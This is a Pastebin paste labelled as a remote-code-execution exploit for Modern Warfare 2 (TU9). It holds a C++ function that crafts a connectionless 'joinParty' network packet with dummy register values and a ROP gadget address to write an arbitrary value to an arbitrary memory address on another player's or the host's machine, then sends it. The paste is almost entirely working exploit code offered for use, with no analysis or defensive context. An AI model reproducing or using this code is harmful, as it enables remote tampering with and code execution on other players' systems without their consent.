Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- mw2 rce tu9
- remote control exploit
- modern warfare 2 tu9 rce
- bool writeIntToClient(int client, int address, int value, bool sendToHost) {
- netadr_t adr;
- std::string payload = "\xFF\xFF\xFF\xFF"; //Connectionless Packet
- payload.append(functions::va("%ijoinParty %i %i %i %i %i ", 1, 139, 1, 1, 0, 47));
- payload.append(functions::va("1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i 1 %i ", 0, 0, 0, 0, address, 0, 0, value, 0, 0, 0, 0, 0));//dummy data and registers
- payload.append(functions::va("%i", 0x820779B8));//gadget: stw r26, 0(r23)
- if (sendToHost) {
- adr = *(netadr_t*)(*(int*)clientConnection_t + 0x10);//grab host's netadr_t struct
- }
- else {
- functions::Live_GetPlayerNetAdr(&adr, *(int*)functions::GetSessionData(), client);//grab client netadr_t struct
- }
- return functions::NET_SendPacket(4, payload.size(), payload.data(), adr);//send the packet
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement